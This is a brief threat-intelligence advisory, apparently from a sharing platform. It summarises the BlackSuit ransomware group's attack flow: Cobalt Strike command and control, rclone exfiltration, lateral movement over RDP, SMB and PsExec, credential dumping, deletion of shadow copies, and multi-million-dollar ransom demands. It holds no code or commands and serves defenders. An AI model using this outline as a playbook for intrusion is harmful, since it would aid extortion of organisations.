A Hybrid Approach with Data Exfiltration and Encryption
July 14, 2025, 11:09 a.m.
Description
The BlackSuit ransomware group, believed to be a rebrand of Royal ransomware, has emerged as a significant threat to organizations. This sophisticated attack combines data exfiltration and encryption, utilizing tools like Cobalt Strike for command and control, rclone for data exfiltration, and BlackSuit ransomware for file encryption. The group's tactics include lateral movement through RDP, SMB, and PsExec, credential dumping, and deletion of shadow copies. Notably, the ransomware uses a -nomutex flag, allowing multiple concurrent executions. The attack flow involves initial access, lateral movement, data exfiltration, partial encryption, and ransom demands ranging from $1 million to $10 million USD in Bitcoin. This hybrid approach highlights the evolving nature of ransomware threats and the need for robust security measures.
Tags
Date
- Created: July 12, 2025, 9:21 a.m.
- Published: July 12, 2025, 9:21 a.m.
- Modified: July 14, 2025, 11:09 a.m.